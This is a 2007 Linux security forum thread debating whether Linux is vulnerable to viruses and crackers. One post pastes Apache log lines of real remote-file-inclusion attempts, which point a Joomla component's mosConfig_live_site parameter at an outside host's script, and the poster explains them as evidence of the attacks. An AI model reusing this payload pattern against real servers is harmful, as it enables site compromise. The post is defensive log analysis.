LinuxQuestions.org
LinuxAnswers - the LQ Linux tutorial section.
Go Back   LinuxQuestions.org > Forums > Linux Forums > Linux - Security
User Name
Password
Linux - Security This forum is for all security related questions.
Questions, tips, system compromises, firewalls, etc. are all included here.

Notices



Poll: Vulnerable?
Be advised that this is a public poll: other users can see the choice(s) you selected.
Poll Options
Vulnerable?

You must log in and have one post to vote in this poll. If you don't have an account, you can register here.
Results will be available after the polls close.

The nominees are:

Yes to both.
No to both.
Yes to viruses.
Yes to hackers.
Other (explain)

Reply
 
Search this Thread
Old 09-19-2007, 10:16 PM   #1
phantom_cyph
Senior Member
 
Registered: Feb 2007
Location: My HDD...
Distribution: WinXP for designing, Linux for life.
Posts: 2,329
Blog Entries: 1

Rep: Reputation: 47
Vulnerable?


Some people say not to worry about viruses in Linux, others do. Some say Linux is an rock-solid wall against hackers, others say its like cutting butter. What do you say?


------------
Personally, I feel like I'd worry more about viruses than hackers (blackhat anyway) cause its a lot simpler to just stick with hacking/cracking Windows or Macs. Other thing is, Linux unlike Windows and Mac has a community, which I think helps keep things in check. I don't keep any sensitive material on my computers anyway that I worry about. Don't have a credit card, so I don't really care. Only thing they'd find is a lot of image editing, webdesigning, and amateur programming. Thats just my humble opinion...

Last edited by phantom_cyph; 09-19-2007 at 10:42 PM. Reason: Gave my explanation...
 
Old 09-19-2007, 10:31 PM   #2
SlowCoder
Member
 
Registered: Oct 2004
Location: Southeast, U.S.A.
Distribution: Fedora (Desktop), CentOS (Server), Knoppix (Diags)
Posts: 934

Rep: Reputation: 38
Nothing is 100% solid. Patches fix current security holes in any OS and softwares. But as software is innovated, new holes will be unknowingly (or rarely knowingly) introduced. There is a race between the whitehats and the blackhats to find these holes, and a difference of just a small amount of time can mean the difference in a world of cracked or happy systems.

Even if you did have a perfectly patched OS, there are still possible holes at the hardware level, such as BIOS or OSI layers 1 and 2.

The best we can hope for is a multi-layer protection, hiding behind firewalls and NATs, killing unneeded services, making sure were patched to the highest version, etc.
 
Old 09-19-2007, 10:37 PM   #3
phantom_cyph
Senior Member
 
Registered: Feb 2007
Location: My HDD...
Distribution: WinXP for designing, Linux for life.
Posts: 2,329
Blog Entries: 1

Original Poster
Rep: Reputation: 47
OK, I'll make an edit to the post. This is all in relation to Windows.

@SlowCoder, good point, and I hope whitehats find it first, I don't feel like having blacks and cracks knocking on my gateway.
 
Old 09-19-2007, 10:37 PM   #4
AceofSpades19
Senior Member
 
Registered: Feb 2007
Location: Chilliwack,BC.Canada
Distribution: Slackware64 -current
Posts: 2,079

Rep: Reputation: 57
Generally speaking you do not need to worry about viruses in linux right now, considering right now there aren't any to speak of. But that doesn't not mean it is impossible to make one.
 
Old 09-19-2007, 11:02 PM   #5
unixfool
Member
 
Registered: May 2005
Location: Northern VA
Distribution: Slackware, Ubuntu, FreeBSD, OpenBSD, OS X
Posts: 781
Blog Entries: 8

Rep: Reputation: 157Reputation: 157
Quote:
Originally Posted by AceofSpades19 View Post
Generally speaking you do not need to worry about viruses in linux right now, considering right now there aren't any to speak of.
That you know of. And I wouldn't say that there shouldn't be any worry, either. As Linux gains market share, it gains popularity...sooner or later (and the way technology changes so quickly nowadays, it'll probably been sooner THAN later) something's going to happen. There's already rootkits, trojans, and other malware that affect Linux systems (although they usually affect userland, the effect, that doesn't lessen the impact)...I'm pretty sure someone out there is toying with some code that will change history.
 
Old 09-19-2007, 11:29 PM   #6
AceofSpades19
Senior Member
 
Registered: Feb 2007
Location: Chilliwack,BC.Canada
Distribution: Slackware64 -current
Posts: 2,079

Rep: Reputation: 57
there has been always rootkits and trojans affecting linux, and there has been linux viruses, its just that they haven't been very successful because they haven't been able to spread very much for 2 reasons
1. the holes they exploit are patched within a short period
2. Linux is so diverse that it is very hard to find an exploit that will harm enough machines to makes it successful
 
Old 09-20-2007, 07:37 AM   #7
brianL
LQ 5k Club
 
Registered: Jan 2006
Location: Oldham, Lancs, England
Distribution: Slackware & Slackware64 14.1
Posts: 7,135
Blog Entries: 52

Rep: Reputation: Disabled
If there are no malware threats to GNU/Linux then why does every distro need security update patches? The threat isn't as great as it is with Windows, but it's there.
 
Old 09-20-2007, 08:49 AM   #8
b0uncer
Guru
 
Registered: Aug 2003
Distribution: CentOS, OS X
Posts: 5,131

Rep: Reputation: Disabled
Every operating system is vulnerable against cracking attacks (I prefer to use the word 'cracking' for doing illegal things, and 'hacking' for doing non-illegal things, like testing to see if a program works like it should, for example). Viruses..well, Windows as a platform is like a nice wet bed for all kinds of mutant organisms to grow on. Linux (and other Unix-like) operating systems have a different approach from a start, so it makes more difficult for Windows-like viruses to spread on them..macroviruses (that I don't think as 'viruses' myself, they're just macros and that's it) can spread everywhere where they can run, but apart from that, Linux is less vulnerable against 'viruses' than Windows is (if you want to compare). This is a thing that can be affected, though; if you just want things to be easy, don't think about security and do some things that ease up your life (but without thinking about the consequences), you may let anybody run anything on your machine, which basically opens doors to malware programs ('viruses'). On the other hand, if you don't just take everything offered, and maybe think a bit about the security of the system, it's pretty hard to get something like a computer virus spread wildly on the machine and it's fellows.

It all depends on the interests of the administrator/users, but generally, if people don't try to make it too easy for the badasses, I consider there's not much to be afraid of about viruses (macro 'viruses': just don't load every macro you're offered..or do you? do you trust a macro that Jesus sent you from the Kambodza, saying it makes your floppy drive print cash if you just let it run?). Crackers are a real threat, as they're human, and there's no bullet-proof systems the difference between a cracker threat (human) and a virus threat (non-human) is that crackers think and learn, viruses don't (unless somebody rewrites them, which takes more time than a cracker learning).

The more known and used an operating system becomes, the more vulnerable it becomes.
 
Old 09-20-2007, 02:47 PM   #9
OlRoy
Member
 
Registered: Dec 2002
Posts: 304

Rep: Reputation: 86
A vulnerability is a weakness, or a lack of a countermeasure. It is possible for Linux to be infected with a virus, it's just no where near as common as it is for Windows.
 
Old 09-20-2007, 06:37 PM   #10
AceofSpades19
Senior Member
 
Registered: Feb 2007
Location: Chilliwack,BC.Canada
Distribution: Slackware64 -current
Posts: 2,079

Rep: Reputation: 57
Quote:
Originally Posted by b0uncer View Post
Every operating system is vulnerable against cracking attacks (I prefer to use the word 'cracking' for doing illegal things, and 'hacking' for doing non-illegal things, like testing to see if a program works like it should, for example). Viruses..well, Windows as a platform is like a nice wet bed for all kinds of mutant organisms to grow on. Linux (and other Unix-like) operating systems have a different approach from a start, so it makes more difficult for Windows-like viruses to spread on them..macroviruses (that I don't think as 'viruses' myself, they're just macros and that's it) can spread everywhere where they can run, but apart from that, Linux is less vulnerable against 'viruses' than Windows is (if you want to compare). This is a thing that can be affected, though; if you just want things to be easy, don't think about security and do some things that ease up your life (but without thinking about the consequences), you may let anybody run anything on your machine, which basically opens doors to malware programs ('viruses'). On the other hand, if you don't just take everything offered, and maybe think a bit about the security of the system, it's pretty hard to get something like a computer virus spread wildly on the machine and it's fellows.

It all depends on the interests of the administrator/users, but generally, if people don't try to make it too easy for the badasses, I consider there's not much to be afraid of about viruses (macro 'viruses': just don't load every macro you're offered..or do you? do you trust a macro that Jesus sent you from the Kambodza, saying it makes your floppy drive print cash if you just let it run?). Crackers are a real threat, as they're human, and there's no bullet-proof systems the difference between a cracker threat (human) and a virus threat (non-human) is that crackers think and learn, viruses don't (unless somebody rewrites them, which takes more time than a cracker learning).

The more known and used an operating system becomes, the more vulnerable it becomes.
Not necessarily, for example, look at the apache web server more then 50% of web servers use it, there aren't tons of viruses exploiting it or malware for that matter, its the open-source deveoplment model that prevents most viruses from becoming viable on linux, look at windows for example, and look for how long it takes for a patch to be released, now compare it to the patch time of linux, it takes alot less longer for patches to comeout for linux because:
a. there are more people looking at the code then in windows
b. microsoft doesn't nessecarily have to patch it. they can wait as long as they want because they are the only people able to patch it, but with linux anyone can write a patch for it and submit it
and so it is alot harder for a virus to be successful on linux
 
Old 09-21-2007, 01:04 AM   #11
2damncommon
Senior Member
 
Registered: Feb 2003
Location: Calif, USA
Distribution: Debian Wheezy
Posts: 2,839

Rep: Reputation: 48
Quote:
Originally Posted by phantom_cyph View Post
Some people say not to worry about viruses in Linux, others do. Some say Linux is an rock-solid wall against hackers, others say its like cutting butter. What do you say?
WTF?
Any software is vulnerable to what it is discovered to be vulnerable to.
Any fortress can be breached. Any fortress that has not been breached will be.
It is true to say a classic Linux setup can protect against vulnerabilities.
It is true to say that users themselves may be a major cause of breeches.
With any software you realize it's strengths and weaknesses, use the tools available to be informed and protect yourself, and see new discoveries on the daily news.
Linux being invulnerable under any circumstances is nonsense. Linux being strong is not.
 
Old 09-21-2007, 09:12 AM   #12
unixfool
Member
 
Registered: May 2005
Location: Northern VA
Distribution: Slackware, Ubuntu, FreeBSD, OpenBSD, OS X
Posts: 781
Blog Entries: 8

Rep: Reputation: 157Reputation: 157
Quote:
Originally Posted by AceofSpades19 View Post
Not necessarily, for example, look at the apache web server more then 50% of web servers use it, there aren't tons of viruses exploiting it or malware for that matter, its the open-source deveoplment model that prevents most viruses from becoming viable on linux, look at windows for example, and look for how long it takes for a patch to be released, now compare it to the patch time of linux, it takes alot less longer for patches to comeout for linux because:
a. there are more people looking at the code then in windows
b. microsoft doesn't nessecarily have to patch it. they can wait as long as they want because they are the only people able to patch it, but with linux anyone can write a patch for it and submit it
and so it is alot harder for a virus to be successful on linux
Actually, if you look at Apache logs, you'll see (at least I do) quite a few attacks against it. Usually it is varied attacks. Since Apache has many configuration options and because Apache can run PHP, SQL, and many other software behind it, it serves as a conduit for badness.

All public servers get attacked, and there are some attacks specific to Linux-based web servers. If you want to see, I can post a snippet of my logs.

What do I normally see? Tons of either PHP-based attacks, CGI-type attacks (basically, most of the attacks appear to be targeting systems that may be serving dynamic content), SQL injection, walking the directories to see what access they can gain...I can think of much more given time and a direct analysis of my logs.

Since Apache is serving as a conduit a majority of the time, patching Apache won't help...a PHP-based attack has nothing to do with Apache itself, so patching Apache does nothing, in this case.

Harden Apache all you want, but in this day and age, you're doomed to fail if you think that patching Apache will protect you from things like attacks on backend systems that pipe their data to Apache.

EDIT:

Apache access logs are below -

Code:
<attacker IP> - - [21/Sep/2007:11:37:16 -0400] "GET slackware_botlogs/%3Cwbr%20/%3Eslackware.log.12May2007/components/com_slideshow/admin.slideshow1.php?mosConfig_live_site=http://www.studiopietrini.com/contenido/classes/id.txt? HTTP/1.1" 404 306
<attacker IP> - - [21/Sep/2007:11:37:16 -0400] "GET /slackware_botlogs/%3Cwbr%20/%3Eslackware.log.12May2007/components/com_slideshow/admin.slideshow1.php?mosConfig_live_site=http://www.studiopietrini.com/contenido/classes/id.txt? HTTP/1.1" 404 306 "-" "libwww-perl/5.76"
<attacker IP> - - [21/Sep/2007:11:37:16 -0400] "GET /components/com_slideshow/admin.slideshow1.php?mosConfig_live_site=http://www.studiopietrini.com/contenido/classes/id.txt? HTTP/1.1" 404 251
<attacker IP> - - [21/Sep/2007:11:37:16 -0400] "GET /components/com_slideshow/admin.slideshow1.php?mosConfig_live_site=http://www.studiopietrini.com/contenido/classes/id.txt? HTTP/1.1" 404 251 "-" "libwww-perl/5.76"
<attacker IP> - - [21/Sep/2007:11:37:17 -0400] "GET /slackware_botlogs/%3Cwbr%20/components/com_slideshow/admin.slideshow1.php?mosConfig_live_site=http://www.studiopietrini.com/contenido/classes/id.txt? HTTP/1.1" 404 278
<attacker IP> - - [21/Sep/2007:11:37:17 -0400] "GET /slackware_botlogs/%3Cwbr%20/components/com_slideshow/admin.slideshow1.php?mosConfig_live_site=http://www.studiopietrini.com/contenido/classes/id.txt? HTTP/1.1" 404 278 "-" "libwww-perl/5.76"
<attacker IP> - - [21/Sep/2007:11:37:34 -0400] "GET /slackware_botlogs/%3Cwbr%20/%3Eslackware.log.11Mar2007/components/com_slideshow/admin.slideshow1.php?mosConfig_live_site=http://www.studiopietrini.com/contenido/classes/id.txt? HTTP/1.1" 404 306
<attacker IP> - - [21/Sep/2007:11:37:34 -0400] "GET /slackware_botlogs/%3Cwbr%20/%3Eslackware.log.11Mar2007/components/com_slideshow/admin.slideshow1.php?mosConfig_live_site=http://www.studiopietrini.com/contenido/classes/id.txt? HTTP/1.1" 404 306 "-" "libwww-perl/5.76"
Is this a Linux-based attack? No, it is a PHP-based attack that can be used against anything running PHP, whether it is *nix or win*. The attack is using Apache as a vector, though. And, plenty of these types of attacks are successful. If you resolve the attacker IP and follow the directory structure that the attacking IP uses in some Lupper-style attacks, you can see that in most cases, the attacker IP is actually a compromised machine that is now attacking another machine...you can usually see the hosted exploit code.

Last edited by unixfool; 09-21-2007 at 11:55 AM. Reason: log format screwed up
 
Old 09-21-2007, 08:46 PM   #13
AceofSpades19
Senior Member
 
Registered: Feb 2007
Location: Chilliwack,BC.Canada
Distribution: Slackware64 -current
Posts: 2,079

Rep: Reputation: 57
did I say that only patching apache will protect it from attacks? no I don't think so
 
Old 09-22-2007, 10:05 AM   #14
phantom_cyph
Senior Member
 
Registered: Feb 2007
Location: My HDD...
Distribution: WinXP for designing, Linux for life.
Posts: 2,329
Blog Entries: 1

Original Poster
Rep: Reputation: 47
This thread was meant for opinions, not hostility. Ace shouldn't have to defend himself as this isnt a debate class.
 
Old 09-22-2007, 11:20 AM   #15
win32sux
Guru
 
Registered: Jul 2003
Location: Los Angeles
Distribution: Ubuntu
Posts: 9,870

Rep: Reputation: 371Reputation: 371Reputation: 371Reputation: 371
Quote:
Originally Posted by phantom_cyph View Post
This thread was meant for opinions, not hostility. Ace shouldn't have to defend himself as this isnt a debate class.
If there was something said that you feel violates the LQ Rules, please use the Report button and the Mod Team will look into the matter ASAP. I've gone over the thread and I can't find anything "hostile". If you (or anyone else) wish to further discuss this, please email me or another member of the Mod Team, otherwise the thread will get cluttered-up with a bunch of off-topic posts.

That said, you shouldn't really be surprised that a Linux virus thread can get some people very exited. It's actually a well-known phenomenon. BTW, even though this isn't a debate class, we actually do encourage a healthy dose of debate here, as long as it is not off-topic and no relevant LQ Rules are violated.

Last edited by win32sux; 09-22-2007 at 11:26 AM.
 
  


Reply


Thread Tools Search this Thread
Search this Thread:

Advanced Search

Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

BB code is On
Smilies are On
[IMG] code is Off
HTML code is Off


Similar Threads
Thread Thread Starter Forum Replies Last Post
- OpenSSL 0.9.7c [ Vulnerable ] tekmorph Linux - Security 1 11-21-2004 10:31 AM
RedHat 9 - Is it vulnerable now? ikhanr Linux - Newbie 4 10-25-2004 04:02 AM
Mail vulnerable fboor Fedora 3 07-27-2004 06:14 AM
How vulnerable is Linux Vincent_Vega Linux - Security 7 01-18-2004 07:44 AM
Apache Vulnerable to this? Crashed_Again Linux - Security 1 02-02-2003 04:26 AM


All times are GMT -5. The time now is 05:14 AM.

Main Menu
Advertisement
My LQ
Write for LQ
LinuxQuestions.org is looking for people interested in writing Editorials, Articles, Reviews, and more. If you'd like to contribute content, let us know.
Main Menu
Syndicate
RSS1  Latest Threads
RSS1  LQ News
Twitter: @linuxquestions
identi.ca: @linuxquestions
Facebook: linuxquestions Google+: linuxquestions
Open Source Consulting | Domain Registration